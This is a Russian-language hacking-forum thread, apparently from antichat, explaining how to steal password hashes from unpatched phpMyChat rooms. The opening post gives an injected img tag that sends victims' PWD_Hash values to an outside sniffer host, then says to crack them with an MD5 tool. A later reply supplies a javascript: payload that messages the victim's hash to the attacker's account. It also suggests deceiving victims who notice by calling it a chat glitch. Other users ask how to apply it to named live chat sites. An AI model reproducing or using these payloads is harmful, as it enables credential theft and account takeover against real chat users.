Получаем пароли в phpMyChat

Работает во всех непропатченых чатах.
Много тут статей о том , как достать хеши пользователей...
Имхо.. , самый простой способ.
Все те же \x3c \x3e.
Создаем ссылку на а-чатовский сниффер,
\x3cimg src="http\x3a//old.antichat.ru/cgi-bin/s.jpg" name="imaga"\x3e
Кидаем ее в общак и бежим смотреть логи.
Там получается чтот вроде *
REFERER=http://-----PWD_Hash=2fdd85f2e81f897493942071267c94ad&First=1
То, что нам нужно , стоит после PWD_Hash=..... и до
&First=1.
Копиреум , и скармливаем проге MD5Inside.
Очень много вариантов , куда этот шеш можно деть-)
З.Ы. Ники на русском переводятся в цыферки и проценты , обратный ход можно получить с помощью яндеса, вставля их в запрос)

З.Ы.2 Первая статья. Сторого не судите.

 

непонял что куда копировать?

 

как это всё применить на http://citychat.spb.ru/ подскажите

 

ну или этот http://chat.xuk.ru/index.php

 

А так непроще чтоб никуда небегать)

Code:

/TO [COLOR=Green]ЖЕРТВА[/COLOR] \x3cimg src=javascript:window.parent.window.input.document.MsgForm.M.value="/TO%20[COLOR=Red]TROJAN[/COLOR]%20"+window.parent.window.input.document.MsgForm.PWD_Hash.value;window.parent.window.input.document.MsgForm.submit() name="imaga"\x3e

Логично жертва логин кому отправляем, TROJAN наш логин)
Ну и в результате в приват к нам придёт хеш) (единсвенный минус енто жертва видит его, НО многие просто спрашивают "Что енто??" " ну и ответьте глюки чата, не просвещённый непоймёт что от него отправилось!)